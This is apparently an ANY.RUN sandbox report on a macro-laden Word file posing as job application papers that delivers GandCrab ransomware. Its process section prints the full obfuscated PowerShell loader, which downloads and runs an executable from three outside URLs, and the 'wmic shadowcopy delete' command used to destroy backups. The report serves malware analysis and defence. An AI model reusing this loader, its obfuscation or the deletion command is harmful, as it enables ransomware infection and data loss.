General Info

File name

Britta_Hollermann_Bewerbungsunterlagen.doc

Full analysis
https://app.any.run/tasks/c3a6dd92-0006-4d19-be2d-17eb0c0af4e2
Verdict
Malicious activity
Analysis date
3/14/2019, 16:02:33
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

generated-doc

opendir

loader

ransomware

gandcrab

trojan

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

1b737b8b7ce22967d2d4cdedf7dc210d

SHA1

daf8c25d857fbc6e4d9d9b205c98338d54679485

SHA256

dd27b85624cac5b98f2670e1636c0b1787ecb088126d072f58dfb67c76d0fd09

SSDEEP

1536:Wq+PpgnKZXGdythQh/zkq9D4aqFrvlUmz8qtBvNL:1+Da37kq9zqYVqtBvNL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Deletes shadow copies
  • 6.exe (PID: 3020)
Changes settings of System certificates
  • 6.exe (PID: 3020)
Connects to CnC server
  • 6.exe (PID: 3020)
Application was dropped or rewritten from another process
  • 6.exe (PID: 3020)
Downloads executable files from the Internet
  • powershell.exe (PID: 4076)
Dropped file may contain instructions of ransomware
  • 6.exe (PID: 3020)
Actions looks like stealing of personal data
  • 6.exe (PID: 3020)
Renames files like Ransomware
  • 6.exe (PID: 3020)
Executes PowerShell scripts
  • cmd.exe (PID: 3468)
Writes file to Word startup folder
  • 6.exe (PID: 3020)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 3320)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 3320)
GANDCRAB detected
  • 6.exe (PID: 3020)
Reads the cookies of Mozilla Firefox
  • 6.exe (PID: 3020)
Creates files in the program directory
  • 6.exe (PID: 3020)
Reads Internet Cache Settings
  • 6.exe (PID: 3020)
Adds / modifies Windows certificates
  • 6.exe (PID: 3020)
Removes files from Windows directory
  • powershell.exe (PID: 4076)
Creates files in the user directory
  • powershell.exe (PID: 4076)
  • 6.exe (PID: 3020)
Executable content was dropped or overwritten
  • powershell.exe (PID: 4076)
Creates files in the Windows directory
  • powershell.exe (PID: 4076)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3320)
Creates files in the user directory
  • WINWORD.EXE (PID: 3320)
Dropped object may contain TOR URL's
  • 6.exe (PID: 3020)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.docm
|   Word Microsoft Office Open XML Format document (with Macro) (53.6%)
.docx
|   Word Microsoft Office Open XML Format document (24.2%)
.zip
|   Open Packaging Conventions container (18%)
.zip
|   ZIP compressed archive (4.1%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0x7df6b578
ZipCompressedSize:
427
ZipUncompressedSize:
1637
ZipFileName:
[Content_Types].xml
XML
Template:
Normal.dotm
TotalEditTime:
null
Pages:
1
Words:
null
Characters:
1
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
1
Paragraphs:
1
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
null
Company:
null
LinksUpToDate:
No
CharactersWithSpaces:
1
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
16
Keywords:
null
LastModifiedBy:
Admin
RevisionNumber:
4
CreateDate:
2019:03:13 14:16:00Z
ModifyDate:
2019:03:13 15:23:00Z
XMP
Title:
null
Subject:
null
Creator:
admin
Description:
null

Screenshots

Processes

Total processes
41
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start download and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB 6.exe wmic.exe vssvc.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3320
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Britta_Hollermann_Bewerbungsunterlagen.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\program files\common files\microsoft shared\textconv\wpft532.cnv
c:\program files\common files\microsoft shared\textconv\msconv97.dll
c:\program files\common files\microsoft shared\textconv\wpft632.cnv
c:\program files\common files\microsoft shared\textconv\recovr32.cnv
c:\program files\common files\microsoft shared\textconv\wks9pxy.cnv
c:\windows\system32\userenv.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\winmm.dll
c:\windows\system32\windowscodecsext.dll
c:\windows\system32\mscms.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\msproof7.dll

PID
3468
CMD
c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG);
Path
c:\windows\system32\cmd.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
4076
CMD
powershell $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG);
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\temp\6.exe
c:\windows\system32\netutils.dll

PID
3020
CMD
"C:\windows\temp\6.exe"
Path
C:\windows\temp\6.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
djsoft.net (c) 2003-2015
Description
Nullable Arsenals Identifier Addpackage
Version
Modules
Image
c:\windows\temp\6.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\avifil32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\msacm32.dll
c:\windows\system32\msvfw32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\glu32.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ntkrnlpa.exe
c:\windows\system32\kbdus.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\schannel.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
1368
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
Parent process
6.exe
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3740
CMD
C:\Windows\system32\vssvc.exe
Path
C:\Windows\system32\vssvc.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssvc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\atl.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\clusapi.dll
c:\windows\system32\cryptdll.dll
c:\windows\system32\xolehlp.dll
c:\windows\system32\version.dll
c:\windows\system32\resutils.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\authz.dll
c:\windows\system32\virtdisk.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vss_ps.dll
c:\windows\system32\samlib.dll
c:\windows\system32\es.dll
c:\windows\system32\propsys.dll
c:\windows\system32\catsrvut.dll
c:\windows\system32\mfcsubs.dll

Registry activity

Total events
1868
Read events
1088
Write events
779
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
3320
WINWORD.EXE
delete key
